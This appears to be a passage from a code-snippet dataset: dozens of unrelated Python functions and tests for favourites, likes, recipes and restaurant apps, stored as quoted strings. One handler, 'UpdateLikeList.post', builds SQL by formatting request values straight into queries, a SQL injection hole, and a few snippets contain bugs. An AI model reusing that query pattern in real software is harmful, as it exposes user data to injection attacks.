read_criteria(Favorite,{\"user_id\":login_session[\"user_id\"]},session,\"m\") or []\n favorites_room_json = [room_json(favorite.room, session,app.config[\"OFFLINE_TESTING\"], login_session) for favorite in favorites]\n return generate_response(elem={\"favorites\":favorites_room_json})\n # part2: check json, handle POST request\n checked_json, response, requested_json = check_json_form(request,MESSAGE_BAD_JSON,MESSAGE_GET_FAV_NO_JSON)\n if checked_json != True: return response\n # verify room id type, with strict mode\n requested_json[\"user_id\"] = login_session[\"user_id\"]\n correct_format,valid_update_pairs, response = process_request_json(Favorite,requested_json, True, access_mode=\"read\",nondb_type_map={\"action\":str})\n if correct_format == False: \n return response\n room = get_row_if_exists(Room, session, ** {\"id\": requested_json[\"room_id\"]})\n user = get_row_if_exists(User, session, ** {\"id\": login_session[\"user_id\"]})\n # if the room id in the request doesn't fit any entry in db, return error message\n if room is None:\n response = generate_message(MESSAGE_FAV_ROOM_NOT_EXIST,404)\n return response\n if requested_json[\"action\"] == \"add\":\n # the add favorite already handle duplicates add\n # it treats multiple adds as one add and every duplicate add afterwards is 
counted as success\n add_favorite(room,user, session)\n response = generate_message(MESSAGE_POST_FAV_ADD_SUCCESS,201)\n return response\n elif requested_json[\"action\"] == \"delete\":\n # the delete favorite already handle duplicates delete\n # it treats multiple delete as one delete and every duplicate delete afterwards is counted as success\n remove_entry(Favorite,requested_json[\"room_id\"], session)\n response = generate_message(MESSAGE_POST_FAV_DEL_SUCCESS,200)\n return response\n else: # method not supported\n response = generate_message(MESSAGE_POST_FAV_METHOD_NOT_SUPPORTED,405)\n return response", "def test_display_favorite(self):\n\n result = self.client.get(\"/view_favorites\")\n self.assertIn(b\"s1925148\", result.data)", "def add_to_fav(show_id, name):\n db = get_db()\n db.execute(\n 'INSERT INTO shows_users (show_id, user_id)'\n ' VALUES (?, ?)',\n (show_id, session['user_id'])\n )\n\n flash('\\\"%s\\\" has been successfully added to your favourite TV Shows!' % name)\n db.commit()\n return redirect(request.referrer)", "def favourite_create(self, data, sesh):\n\n\t\t# Verify fields\n\t\ttry: DictHelper.eval(data, ['id'])\n\t\texcept ValueError as e: return Services.Effect(error=(1001, [(f, \"missing\") for f in e.args]))\n\n\t\t# If someone tries to add themselves\n\t\tif data['id'] == sesh['thrower']['_id']:\n\t\t\treturn Services.Effect(False);\n\n\t\t# Make sure the thrower exists\n\t\tif not Thrower.exists(data['id']):\n\t\t\treturn Services.Effect(error=(1104, data['id']))\n\n\t\t# Add the thrower to the logged in thrower's favourites and return the\n\t\t#\tresult\n\t\treturn Services.Effect(\n\t\t\tFavourites.add(sesh['thrower']['_id'], data['id'])\n\t\t)", "def testing_favourites(self, email, password, song):\n add_to_favourites = Favourites(self.driver, email, password, song)\n add_to_favourites.open_login_page()\n add_to_favourites.set_user_inputs()\n add_to_favourites.open_home_page()\n add_to_favourites.selecting_a_random_song()\n assert add_to_favourites.check_the_song_is_displayed() is True, 'Song is not displaying'\n add_to_favourites.add_to_wishlist()\n add_to_favourites.go_to_favourites_page()\n assert add_to_favourites.check_the_song_is_added_to_wishlist() == song, 'Not the song'", "def add_testing_site():\n\n test_id = request.form.get('test_id')\n favorite = { \n 'status': None,\n }\n try:\n if 'user_id' in session:\n user_id = session['user_id']\n\n already_favorited = check_testing_saved_location_in_favorites(user_id, test_id)\n\n if already_favorited:\n favorite['status'] = 'already_favorited'\n flash('Already saved to favorites.')\n return jsonify(favorite)\n\n else:\n favorite['status'] = 'added'\n saved_location = create_testing_saved_locations(user_id, test_id) \n location = get_testing_location_by_test_id(test_id)\n flash(f'Testing Location {location.alternate_name} saved to profile!')\n return jsonify(favorite)\n\n else:\n flash('Please login to save a location!')\n\n except Exception as e:\n msg = f\"Error. 
Tried adding {test_id} to db failed: \\n {e}.\"\n return jsonify(msg) \n\n return jsonify('Success!')", "def FoodCheckIn(sc, event):\n channel = sc.api_call('channels.info', channel=event['channel'])\n food = event['text'][9:]\n if food:\n if 'pizza' in food:\n sc.api_call('reactions.add', as_user='true', channel=event['channel'],\n timestamp=event['ts'], name='pizza')\n user = sc.api_call('users.info', user=event['user'])\n db = pymysql.connect(host='localhost', user='pizzabot', db='pizzachat')\n cursor = db.cursor()\n query = 'INSERT INTO foodlist (who, what) VALUES (%s, %s)'\n cursor.execute(query, (user['user']['name'], food.encode('utf-8')))\n db.commit()\n db.close()", "def test_user_own_recipes(self):\n\n recipe1 = Recipe(uri=\"testuri\", name=\"testname\", image_url=\"test_image_url\", user_id=self.uid)\n recipe2 = Recipe(uri=\"testuri2\", name=\"testname2\", image_url=\"test_image_url2\")\n\n db.session.add_all([recipe1, recipe2])\n db.session.commit()\n\n self.assertEqual(recipe1.user_id, self.uid)\n self.assertNotEqual(recipe2.user_id, self.uid)\n self.assertEqual(recipe2.user_id, None)", "def test_create_ingredient_successful(self):\n payload = {'name':'Cabbage'}\n self.client.post(INGREDIENTS_URL, payload)\n exists = Ingredient.objects.all().filter(user=self.user, name=payload['name']).exists\n self.assertTrue(exists)", "def test_add_remove_from_wishlist(self):\n url = reverse('add-to-wishlist')\n data = {\n 'igdb': self.game.igdb,\n 'name': self.game.name,\n 'slug': self.game.slug,\n 'cover_id': self.game.cover_id,\n 'backdrop_id': self.game.backdrop_id\n }\n\n add = self.client.post(url, data, format='json')\n self.assertEqual(True, add.data['value'])\n\n remove = self.client.post(url, data, format='json')\n self.assertEqual(False, remove.data['value'])", "def favorited(self: Article, request: Request):\n if not request.user:\n return False\n\n if self in request.user.favorites:\n return True\n\n return False", "def setUp(self):\n self.prod_1 = Product.objects.create(\n pk=1,\n ean='3350033118072',\n name='test 1',\n category='cat 1',\n image='product_default.png',\n nutriscore='u'\n )\n\n self.user_1 = User.objects.create_user(\n pk=1,\n username='Fav Models Unit Test 1',\n email='[email protected]'\n )\n\n self.fav_1 = Favourite.objects.create(\n pk=1,\n date_added='2019-12-20 09:00:00',\n user=self.user_1,\n product=self.prod_1\n )", "def favourite(self, favourite):\n\n self._favourite = favourite", "def add_fav_drinks(self, user_id, drinks): \n assert type(user_id) == str\n assert type(drinks) == list\n\n fav_drinks = self.get_fav_drinks(user_id)\n user_check = self.users.get_user_name(user_id)\n drinks_check = [self.drinks.get_drinks_by_flavor_and_type(d.get('flavor'), d.get('type')) for d in drinks]\n\n # make sure that at least one drink exists in the list\n if all(x is None for x in drinks_check):\n print(\"All drinks provided do not exist. 
We will not add favorite drinks since one of the drinks must already exist.\")\n \n # user does not exist\n elif user_check is None: \n print(\"User Id {} does not exist.\".format(user_id))\n \n # add fav drinks\n else : \n # user has existing fav drinks\n if fav_drinks is not None:\n for d in drinks:\n # add the drink if it does not exist \n drink_id = self.drinks.add_drink(d.get('type'), d.get('flavor'))\n fav_drinks.append(drink_id)\n # user has no existing fav drinks\n else :\n ids = []\n for d in drinks:\n # add the drink if it does not exist \n ids.append(self.drinks.add_drink(d.get('type'), d.get('flavor')))\n\n fd_id = self.__generate_id()\n self.favorite_drinks.append({\"id\": fd_id, \"user_id\": user_id, \"drink_id\": ids})", "def test_create_ingredient(self):\n\n ingredient_payload = {'name': 'Test Ingredient'}\n self.client.post(URL_INGREDIENTS, ingredient_payload)\n\n is_ingredient_created = Ingredient.objects.filter(\n user=self.user,\n name=ingredient_payload['name']\n ).exists()\n\n self.assertTrue(is_ingredient_created)", "def toggle_favorite(self, user, article, is_favoriting):\n if user not in article.favorited_by.all() and is_favoriting:\n article.favorited_by.add(user)\n if user in article.favorited_by.all() and not is_favoriting:\n article.favorited_by.remove(user)\n article.favoritesCount = article.favorited_by.all().count()\n article.save()", "def test_create_ingredient_successful(self):\n payload = {\n 'name': 'turmeric'\n }\n\n self.client.post(INGREDIENT_URL, payload)\n\n exists = Ingredients.objects.filter(\n user=self.user,\n name=payload['name']\n ).exists()\n\n self.assertTrue(exists)", "def added_by(self, user):\n return ChefsHasRecipes.objects.filter(recipe=self, chef=user).exists()", "def test_create_ingredient_succesfull(self):\n\n payload = {'name': 'Cabbage'}\n self.client.post(INGREDIENTS_URL, payload)\n\n exist = Ingredient.objects.filter(\n user=self.user,\n name=payload['name'],\n ).exists()\n self.assertTrue(exist)", "def test_new_flight_succeeds(self, init_db, new_flight):\n assert new_flight == new_flight.save()", "def set_favorite(request):\n company_id = request.data.get('id')\n company = Company.objects.get(id=company_id)\n\n request.user.profile.companies.add(company)\n return Response({'favorite': True})", "def create(self, validated_data):\n user_data = validated_data.pop('user')\n user = User.object.get(id=user_data.id)\n restaurant, created = Restaurant.objects.update_or_create(user=user, data=validated_data)\n return restaurant", "def update_favourites(self, item_info, status):\r\n if status == \"Add\":\r\n return self.model.add_to_favourites(item_info)\r\n elif status == \"Remove\":\r\n return self.model.delete_from_favourites(item_info)", "def add_fav_drink(self, user_id, drink_id):\n assert type(user_id) == str\n assert type(drink_id) == str \n\n existing_drink = False if self.drinks.get_drink_by_id(drink_id) is None else True\n existing_user = False if self.users.get_user_name(user_id) is None else True\n if not existing_drink:\n print(\"Drink does not exist.\")\n elif not existing_user:\n print(\"User does not exist.\")\n else :\n fav_drinks = self.get_fav_drinks(user_id)\n if fav_drinks is not None:\n if drink_id not in fav_drinks:\n fav_drinks.append(drink_id)\n else : # user exists but has no fav drinks\n fd_id = self.__generate_id()\n self.favorite_drinks.append({\"id\": fd_id, \"user_id\": user_id, \"drink_id\": [drink_id]})", "def test_create_ingredient_successful(self):\n payload = {'name': \"Test ingredient\"}\n\n # in order 
to create user must be already authenticated\n self.client.post(INGREDIENTS_URL, payload)\n\n exists = Ingredient.objects.filter(\n user=self.user,\n name=payload['name'],\n ).exists()\n\n self.assertTrue(exists)", "def test_update(self, init_db, favorite):\n params = {\n \"title\": \"Category\",\n \"description\": fake.alphanumeric(100),\n }\n favorite.update(**params)\n assert favorite.title == params['title']\n assert favorite.description == params['description']", "def mark_favorite(request, object_id):\n feed_item = get_object_or_404(FeedItem, id=object_id)\n fav_item, is_new = FavoriteItem.objects.get_or_create(feed_item=feed_item)\n if request.is_ajax():\n return JSONResponse({'status': 'ok', 'text': 'Marked as favorite'}, False)\n return redirect(request.META.get('HTTP_REFERER', 'feed_item_list'))", "def test_if_user_can_add_and_retrieve_data(self):\n # take the first three drinks\n drinks = self.test_data[\"drinks\"][:3]\n # create drink objects from the json data\n drinks = [Drink(**i) for i in drinks]\n Drink.objects.bulk_create(drinks)\n\n data = self.test_data[\"data\"][0]\n # use drink ids added to the db for this particular\n # test\n data[\"drink_id\"] = drinks[random.randint(0, 2)]._id\n\n response = self.client.post(\"/data/data_collected/\",\n data, format='json')\n\n # assert it data was added correctly\n self.assertEqual(response.status_code,\n status.HTTP_201_CREATED)\n\n # retrieve the data added\n response = self.client.get(\"/data/data_collected/\")\n\n # assert if the response is 200\n self.assertEqual(response.status_code, 200)\n\n # get the number of added data records\n data_added_count = len(response.json())\n\n # assert if the data added is one\n self.assertEqual(data_added_count, 1)", "def update_favorite_things():\n data = request.data\n favorite_things = json.loads(data)\n print(favorite_things)\n connection = mongo_connect()\n if(favorite_things[\"action\"] == \"add\"):\n connection[\"users\"].update_one(\n {\"_id\": ObjectId(session[\"_id\"])},\n {\"$push\": {\n favorite_things[\"type\"]: ObjectId(favorite_things[\"item_id\"])\n }\n }\n )\n else:\n connection[\"users\"].update_one(\n {\"_id\": ObjectId(session[\"_id\"])},\n {\"$pull\":\n {\n favorite_things[\"type\"]:\n ObjectId(favorite_things[\"item_id\"])\n }\n }\n )\n resp = jsonify(success=True)\n return resp", "def test_api_can_add_food_to_a_meal(self):\n response = self.client.post(f'/api/v1/meals/{self.breakfast.id}/foods/{self.oatmeal.id}')\n # import code; code.interact(local=dict(globals(), **locals()))\n\n self.assertEqual(response.data['message'], \"Successfully added oatmeal to breakfast\")", "def test_delete(self, init_db, favorite):\n favorite.delete()\n assert Favorite.get(favorite.id) == None", "def NewFood(r, foods):\n hasError = False\n for i in foods:\n try:\n food_form = FoodForm(i)\n if food_form.is_valid():\n food = food_form.save(commit=False)\n\n # store base64 type image into food.src\n if isBase64Image(i[\"src\"]):\n file = getImgContentFile(i[\"src\"])\n try:\n Image.open(file)\n food.src = file\n except IOError:\n print(\"Not a image.\")\n hasError = True\n food.restaurant = r\n food.save()\n else:\n hasError = True\n except:\n print(\"new error\")\n hasError = True\n return hasError", "def test_create_ingredient_successful(self):\n\n payload = {'name': 'Salt'}\n\n res = self.client.post(INGREDIENTS_URL, payload)\n\n exists = Ingredient.objects.filter(\n user=self.user,\n name=payload['name']\n ).exists()\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n 
self.assertTrue(exists)", "def saveUserFavorites(request, userid):\n try:\n User.objects.get(id=userid)\n newFavorite = FavoriteSerializer(data=request.data)\n print(request.data)\n if newFavorite.is_valid():\n try:\n Item.objects.get(id=request.data.get(\"item\"))\n newFavorite.save()\n return Response(newFavorite.data, status=status.HTTP_201_CREATED)\n \n except Item.DoesNotExist:\n fail = {\n \"Item\":\"doesnotexist\"\n }\n return JsonResponse(fail)\n \n #for testing ONLY\n print(newFavorite.errors)\n #f##########\n\n fail = {\n \"user\": \"requestdatanotvalid\",\n \"item\":\"requestdatanotvalid\"\n }\n return JsonResponse(fail)\n\n except User.DoesNotExist:\n fail = {\n \"user\":\"doesnotexist\"\n }\n return JsonResponse(fail)", "def test_view_url_propose_product_already_in_favorites(self):\r\n self.client.login(username='test', password='test')\r\n response = self.client.get(reverse('search_results'),\r\n {'query': '', 'name': 'nutella'})\r\n self.assertEqual(response.status_code, 200)\r\n self.assertTemplateUsed(response, 'purbeurre/search_results.html')", "def fav_place_check(uri):\n return veggiesailor.StorageFav().exists(uri)", "def test_given_a_user_when_I_add_a_todo_Then_I_can_access_it_from_user_todo_collection(self):\n from .models import Tag\n from .models import TodoUser\n from .models import TodoItem\n\n user = TodoUser(\n email=u'[email protected]',\n first_name=u'Arthur',\n last_name=u'Pendragon',\n )\n self.session.add(user)\n\n tags = [u'quest', u'ni', u'knight']\n\n todo = TodoItem(user.email,\n u'Find a shrubbery', \n [u'quest', u'ni', u'knight'] \n ) \n self.session.add(todo)\n \n user_todo = user.todo_list.one()\n self.assertTrue(todo is user_todo)", "def test_addUser(self):\n self.new_user.saveUser()\n self.assertEqual(len(User.users_list),1)", "def test_favs(app):\n res = app.get('/favs')\n assert res.status_code == 200\n assert b'bloom' in res.data", "def test_new_likes(self):\n\n new_user = User.signup(\"newuser\", \"[email protected]\", \"password123\", None)\n db.session.add(new_user)\n db.session.commit()\n\n new_msg = Message(text=\"A new message from a new user\", user_id=new_user.id)\n db.session.add(new_msg)\n db.session.commit()\n\n new_user.likes.append(new_msg)\n db.session.commit()\n\n likes = Likes.query.all()\n self.assertEqual(len(likes), 1)\n self.assertEqual(likes[0].user_id, new_user.id)\n self.assertEqual(likes[0].message_id, new_msg.id)", "def test_returns_projects_favourited_by_user_if_favourited_by_me_is_true(self):\n # Arrange\n # Make all projects to be accessible for user\n self.test_project_2.private = False\n self.test_project_2.save()\n self.test_project_3.status = ProjectStatus.PUBLISHED.value\n self.test_project_3.save()\n self.test_user.favorites = [self.test_project_1]\n self.test_user.save()\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"favoritedByMe\": \"true\"},\n )\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 1)\n self.assertEqual(\n response.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )", "def add_to_fav(request, q_id):\n if request.method == 'POST':\n Quotes.objects.add_to_user_fav(request.session['id'], q_id)\n return redirect('/quotes')", "def connect_user(self, user):\n\t\tis_user_added = False\n\t\tif not user in self.users.all():\n\t\t\tself.users.add(user)\n\t\t\tself.save()\n\t\t\tis_user_added = True\n\t\telif user in self.users.all():\n\t\t\tis_user_added = 
True\n\t\treturn is_user_added", "def favorite(self) -> bool:\n return self._favorite", "def post(self):\n # fetch parameter\n get_parser = reqparse.RequestParser(bundle_errors=True)\n get_parser.add_argument(\"user_id\", required=True, help=\"User ID required to ad to their favourite projects\")\n get_parser.add_argument(\"project_id\", required=True, help=\"Project ID required to add to the favourite projects\")\n args = get_parser.parse_args(strict=True)\n\n # get user_id and project_id\n user_id = args[\"user_id\"]\n project_id = args[\"project_id\"]\n\n # convert parameter ids into objectids\n try:\n user_id = ObjectId(user_id)\n project_id = ObjectId(project_id)\n except:\n return {\"message\": \"invalid user id or project id\"}, 400\n\n # add project to the user's favourites\n if ('user_id' or 'project_id') not in args.keys():\n return {\"message\": \"both user and project id are required\"}, 400\n else:\n # check if user is valid\n user = self.users.find_one({\"_id\": user_id})\n project = self.projects.find_one({\"_id\": project_id})\n if user is None:\n return {\"message\": \"user not found\"}, 404\n elif project is None:\n return {\"message\": \"project not found\"}, 404\n else:\n # add project to favourites\n user_favourites = self.favourites.find_one({\"user_id\": user_id})\n if user_favourites is None:\n # insert a new doc into favourites collection\n favourites_list = []\n favourites_list.append(deepcopy(project)) \n self.favourites.insert({\n \"user_id\": user_id,\n \"favourite_projects\": favourites_list\n })\n else:\n new_favourite_list = user_favourites[\"favourite_projects\"]\n\n # check if this project is already in the user's favourites\n for proj in new_favourite_list:\n if proj[\"_id\"] == project_id:\n return {\"message\": \"project is already in the favourites list\"}, 400\n\n new_favourite_list.append(deepcopy(project))\n updated_list = {\"favourite_projects\": new_favourite_list}\n\n self.favourites.update({\"user_id\": user_id}, {\"$set\": updated_list}, upsert=False)\n \n return {\"status\": \"project has been added to favourites successfully\"}, 200", "def save(self, substitute_choice, product_choice):\n self.db.query(f\"\"\"\n INSERT INTO {self.table} (substitut_id, original_id)\n VALUES (:substitut_id, :original_id)\n ON DUPLICATE KEY UPDATE substitut_id = :substitut_id\n \"\"\", substitut_id=substitute_choice.id, original_id=product_choice.id)\n favorite = (substitute_choice.id, product_choice.id)\n return favorite", "def test_add(self):\n # add a todo\n self.add(title=\"Sample task todo\", description=\"for sample\", state=\"todo\")\n task = Task.query.filter_by(title='Sample task todo').first()\n self.assertEqual(task.description, 'for sample')\n self.assertEqual(task.state, 'todo')\n\n # add a doing\n self.add(title=\"Sample task doing\", description=\"for sample\", state=\"doing\")\n task = Task.query.filter_by(title=\"Sample task doing\").first()\n self.assertEqual(task.description, 'for sample')\n self.assertEqual(task.state, 'doing')\n\n # add a done\n self.add(title=\"Sample task done\", description=\"for sample\", state=\"done\")\n task = Task.query.filter_by(title='Sample task done').first()\n self.assertEqual(task.description, 'for sample')\n self.assertEqual(task.state, 'done')", "def favorite(request, movie_id):\n\n movie = get_object_or_404(Movie, pk=movie_id)\n try:\n if movie.liked:\n movie.liked = False\n else:\n movie.liked = True\n movie.save()\n except (KeyError, Movie.DoesNotExist):\n return JsonResponse({'success': False})\n else:\n 
return JsonResponse({'success': True})", "def saving_search(request, id_movie):\n movie = Movie.objects.get(id_code=id_movie)\n Favorite.objects.get_or_create(user_link=request.user,\n movie_saved=movie)\n return redirect('home')", "def test_save_users(self):\n\n self.new_users.save_users() # saving the new user\n self.assertEqual(len(User.user_list), 1)", "def favorite(self, favorite: bool):\n if favorite is None:\n raise ValueError(\"Invalid value for `favorite`, must not be `None`\")\n\n self._favorite = favorite", "def post_favorite(request, pk=None):\n post = Post.objects.get(pk=pk).original_or_self()\n if post.favorites.filter(pk=request.user.pk).exists():\n post.favorites.remove(request.user)\n else:\n post.favorites.add(request.user)\n post.save()\n\n referer = request.META['HTTP_REFERER']\n if referer:\n return redirect(referer)\n else:\n return redirect('posts:post', pk=post.pk)", "def restaurants_new():\n # If the user isn't logged in, send to the login page\n if helper.handle_login(login_session) is False:\n return redirect('/login')\n\n if request.method == 'POST':\n if len(request.form['name']) > 0:\n new_restaurant = Restaurant(name=request.form['name'],\n address=request.form['address'],\n phone=request.form['phone'],\n web=helper.check_restaurant_URL(request.form['web']),\n description=request.form['description'],\n user_id=login_session['user_id'])\n session.add(new_restaurant)\n session.commit()\n flash(\"New restaurant created - {}\".format(new_restaurant.name))\n tag_line = request.form['tag_line']\n tag_list = tag_line.split(',')\n for tag in tag_list:\n helper.add_tag_if_not_exists(tag, new_restaurant.id)\n return redirect(url_for('restaurants_page'))\n else:\n flash(\"Incorrect Restaurant details - Please include a name!\")\n\n user_info = helper.get_user_if_exists(login_session)\n return render_template('newrestaurant.html', user_info=user_info)", "def test_get_and_set_star(self):\n email = '[email protected]'\n feature_id = self.feature_1.key.integer_id()\n notifier.FeatureStar.set_star(email, feature_id)\n actual = notifier.FeatureStar.get_star(email, feature_id)\n self.assertEqual(email, actual.email)\n self.assertEqual(feature_id, actual.feature_id)\n self.assertTrue(actual.starred)\n updated_feature = models.Feature.get_by_id(feature_id)\n self.assertEqual(1, updated_feature.star_count)\n\n notifier.FeatureStar.set_star(email, feature_id, starred=False)\n actual = notifier.FeatureStar.get_star(email, feature_id)\n self.assertEqual(email, actual.email)\n self.assertEqual(feature_id, actual.feature_id)\n self.assertFalse(actual.starred)\n updated_feature = models.Feature.get_by_id(feature_id)\n self.assertEqual(0, updated_feature.star_count)", "def test_save(self):\n self.assertEqual(CalendallUser.objects.count(), len(self.data))", "def test_favorites_posts(self):\n self.resource._request.register_uri(\n 'GET', '/users/dotzero/favorites/posts?page=2', 'fixture_post.json')\n\n response = self.resource.favorites_posts('dotzero', 2)\n\n self.assertTrue('data' in response)\n self.assertTrue('server_time' in response)", "def test_create_shelf(self, *_):\n form = forms.ShelfForm()\n form.data[\"user\"] = self.local_user.id\n form.data[\"name\"] = \"new shelf name\"\n form.data[\"description\"] = \"desc\"\n form.data[\"privacy\"] = \"unlisted\"\n request = self.factory.post(\"\", form.data)\n request.user = self.local_user\n\n views.create_shelf(request)\n\n shelf = models.Shelf.objects.get(name=\"new shelf name\")\n self.assertEqual(shelf.privacy, \"unlisted\")\n 
self.assertEqual(shelf.description, \"desc\")\n self.assertEqual(shelf.user, self.local_user)", "def add_favourites_field():\n existing = read_json()\n\n if 'favourites' not in existing[0].keys(): # if the field has not already been added, add it.\n for club in existing:\n club['favourites'] = 0\n write_json(existing)", "def accept(self):\n receiver_friend_list = FriendList.objects.filter(user_id=self.receiver_id)\n sender_friend_list = FriendList.objects.filter(user_id=self.sender_id)\n if(receiver_friend_list.exists()):\n receiver_friend_list = receiver_friend_list[0]\n else:\n receiver_friend_list = FriendList.objects.create(user_id=self.receiver_id)\n\n if(sender_friend_list.exists()):\n sender_friend_list = sender_friend_list[0]\n else:\n sender_friend_list = FriendList.objects.create(user_id=self.sender_id)\n\n if receiver_friend_list:\n receiver_friend_list.add_friend(self.sender_id)\n if sender_friend_list:\n sender_friend_list.add_friend(self.receiver_id)\n self.is_active = False\n self.save()", "def test_add_or_remove_like_from_db(self):\n session = UnifiedAlchemyMagicMock()\n with mock.patch(\"app.DB.session\", session):\n app.add_or_remove_like_from_db(\"username\", 0)\n is_liked = (\n session.query(app.models.Likes.id)\n .filter_by(username=\"username\", post_id=0)\n .scalar()\n is not None\n )\n session.commit()\n self.assertEqual(is_liked, True)", "def test_update_restaurant(self):\n from espresso import db\n from espresso import Restaurant\n\n name = 'Restaurant Mexicano'\n zip_code = \"94110\"\n db.session.add(Restaurant(name=name, creator='[email protected]', zip_code=zip_code))\n db.session.commit()\n\n headers = {'Content-Type': 'application/json'}\n headers.update(auth_header_cru_restaurants)\n website = 'www.mexicano-nj.com'\n email = '[email protected]'\n info = {'website': website, 'email': email}\n resp = self.test_client.put(self.API_BASE + '/1', headers=headers, data=json.dumps(info))\n\n self.assertEqual(resp.status_code, 200)\n resp_dict = json.loads(resp.data)\n self.assertEqual(resp_dict['id'], 1)\n self.assertTrue(name in resp_dict['message'])\n\n # Check that all restaurant fields are returned.\n self.assertTrue('restaurant' in resp_dict)\n self.assertEqual(resp_dict['restaurant']['id'], 1)\n self.assertEqual(resp_dict['restaurant']['website'], website)\n self.assertEqual(resp_dict['restaurant']['email'], email)\n self.assertEqual(resp_dict['restaurant']['zip_code'], zip_code)\n\n self.assertTrue('name' in resp_dict['restaurant'])\n self.assertTrue('street' in resp_dict['restaurant'])\n self.assertTrue('suite' in resp_dict['restaurant'])\n self.assertTrue('city' in resp_dict['restaurant'])\n self.assertTrue('state' in resp_dict['restaurant'])\n self.assertTrue('phone_num' in resp_dict['restaurant'])\n self.assertTrue('date_established' in resp_dict['restaurant'])\n self.assertTrue('creator' in resp_dict['restaurant'])\n\n # -----------------------------\n # Make a separate request to retrieve the restaurant and assert that updated fields are as intended\n resp = self.test_client.get(self.API_BASE + '/1', headers=auth_header_cru_restaurants)\n\n self.assertEqual(resp.status_code, 200)\n resp_dict = json.loads(resp.data)\n self.assertEqual(resp_dict['restaurant']['id'], 1)\n self.assertEqual(resp_dict['restaurant']['website'], website)\n self.assertEqual(resp_dict['restaurant']['email'], email)\n self.assertEqual(resp_dict['restaurant']['zip_code'], zip_code) # Make sure this has not changed", "def test_like_message(self):\n\n self.u.likes.append(self.m_u2)\n 
db.session.commit()\n\n self.assertEqual(len(self.u.likes), 1)\n self.assertEqual(self.u.likes[0], self.m_u2)", "def test_create_pizza(self):\n url = reverse('pizzas-list')\n data = {'name': 'Quattro Formaggio'}\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(Pizza.objects.count(), 1)\n self.assertEqual(Pizza.objects.get().name, 'Quattro Formaggio')", "def test_add(self):\n r = main.List.connection()\n main.List.add(r, \"ToDo\", 1, \"Buy apples\", 2, \"20.05.2015\")\n task = r.get(\"ToDo\")\n self.assertTrue(task, \"No such entry in DB. Adding failed.\")", "def SetNewFav(self, newFav):\n self.favouriteFood = newFav", "def save(self, *args, **kwargs):\n if not self.require_confirm_email:\n User.objects.filter(is_active=False, deactivation_reason=\"pending\").update(\n is_active=True, deactivation_reason=None\n )\n if not self.invite_question_text:\n self.invite_question_text = \"What is your favourite book?\"\n super().save(*args, **kwargs)", "def test_check_add_flavor(self):\n for flavor_id, flavor in OPENSTACK_FLAVOR.items():\n self.cmd._add_flavor(flavor, flavor_id)\n ralph_flavor = CloudFlavor.objects.get(flavor_id=flavor_id)\n self.assertEqual(ralph_flavor.name, flavor['name'])\n self.assertEqual(ralph_flavor.cloudprovider, self.cloud_provider)\n self.assertIn(flavor['tag'], ralph_flavor.tags.names())\n self.assertEqual(flavor['cores'], ralph_flavor.cores)\n self.assertEqual(flavor['memory'], ralph_flavor.memory)\n self.assertEqual(flavor['disk'], ralph_flavor.disk)", "def add_restaurant_review():\n username = sign_up.get_username()\n if username:\n add_var = dict(user=username, restaurant_name=\"\", restaurant_address=\"\",\n restaurant_item=\"\", item_comments=\"\", item_price=\"\",\n restaurant_ranking=\"\", restaurant_rating=\"\",\n restaurant_rating_reason=\"\", address=\"\", restaurant_chosen=\"\",\n address_chosen=\"\")\n return bottle.template('add_review', add_var=add_var)\n else:\n return bottle.template('login',\n dict(user_error=\"Sorry, you need to be logged in to submit a review, please log below:\", pw_error=\"\"))", "def post(self):\n args = UpdateLikeList.post_parser.parse_args()\n user_name = args.get('user_name')\n restaurant_name = args.get('restaurant_name')\n #rating = args.get('rating')\n newlike = {\n 'user_name':args.get('user_name'),\n 'restaurant_name':args.get('restaurant_name')\n #'rating':args.get('rating')\n }\n conn = db.create_connection(db.connection_config_dict)\n cursor = conn.cursor()\n\n # To get user's user_id\n user_id = []\n sql_1 = 'SELECT user_id FROM User WHERE user_name = \"{user_name}\"'.format(user_name=user_name)\n print(sql_1)\n cursor.execute(sql_1)\n for u in cursor:\n user_id.append(u)\n print(user_id) \n\n # To get restaurant's restaurant_id\n restaurant_id = []\n sql_2 = 'SELECT restaurant_id FROM Restaurant WHERE name = \"{restaurant_name}\"'.format(restaurant_name=restaurant_name)\n print(sql_2)\n cursor.execute(sql_2)\n for u in cursor:\n restaurant_id.append(u)\n print(restaurant_id)\n\n # Insert new restaurant into LikeList table\n # neo4j may need insert data here\n # user id is user_id[0][0], restaurant id is restaurant_id[0][0].\n sql_3 = \"INSERT INTO LikeList (user_id, restaurant_id) VALUES ({user_id}, {restaurant_id});\".format(user_id=user_id[0][0], restaurant_id=restaurant_id[0][0])\n print(sql_3)\n cursor.execute(sql_3)\n\n conn.commit()\n return newlike, 201", "def test_create_recipe_with_ingredient(self):\n ingredient1 = 
sample_ingredient(user=self.user, name='Prawns')\n ingrident2 = sample_ingredient(user=self.user, name ='Ginger')\n\n payload = {\n 'title': 'Thai prawn and curry',\n 'ingredient': [ingredient1.id,ingrident2.id],\n 'time_minuts':60,\n 'price': 250\n }\n res = self.client.post(RECIPE_URL,payload)\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n\n recipe = Recipe.objects.get(id=res.data['id'])\n ingredients = recipe.ingredient.all()\n self.assertEqual(ingredients.count(),2)\n self.assertIn(ingredient1, ingredients)\n self.assertIn(ingrident2,ingredients)", "def count_favorite(self, obj):\n\n return obj.recipe_fav.count()", "def test_func(self):\n return (Student.objects.filter(user=self.request.user).exists())", "def test_create_like(self):\n pokemon = Pokemon.objects.all().first()\n r = self.client.post(\n reverse('create_like'),\n {'pokemon-like-id': pokemon.id},\n HTTP_X_REQUESTED_WITH='XMLHttpRequest'\n )\n\n self.assertEqual(Like.objects.all().count(), 1)", "def test_is_following(self):\n\n self.u1.following.append(self.u2)\n db.session.commit()\n\n self.assertTrue(self.u1.is_following(self.u2))\n self.assertFalse(self.u2.is_following(self.u1))", "def test_is_followed_by(self):\n\n self.u1.followers.append(self.u2)\n db.session.commit()\n\n self.assertTrue(self.u1.is_followed_by(self.u2))\n self.assertFalse(self.u2.is_followed_by(self.u1))", "def test_save_user(self):\n self.new_user.save_user()\n self.assertEqual(len(User.user_list), 1)", "def test_save_user(self):\n self.new_user.save_user()\n self.assertEqual(len(User.user_list), 1)", "def test_ingredients_limited_to_user(self):\n\n user2 = 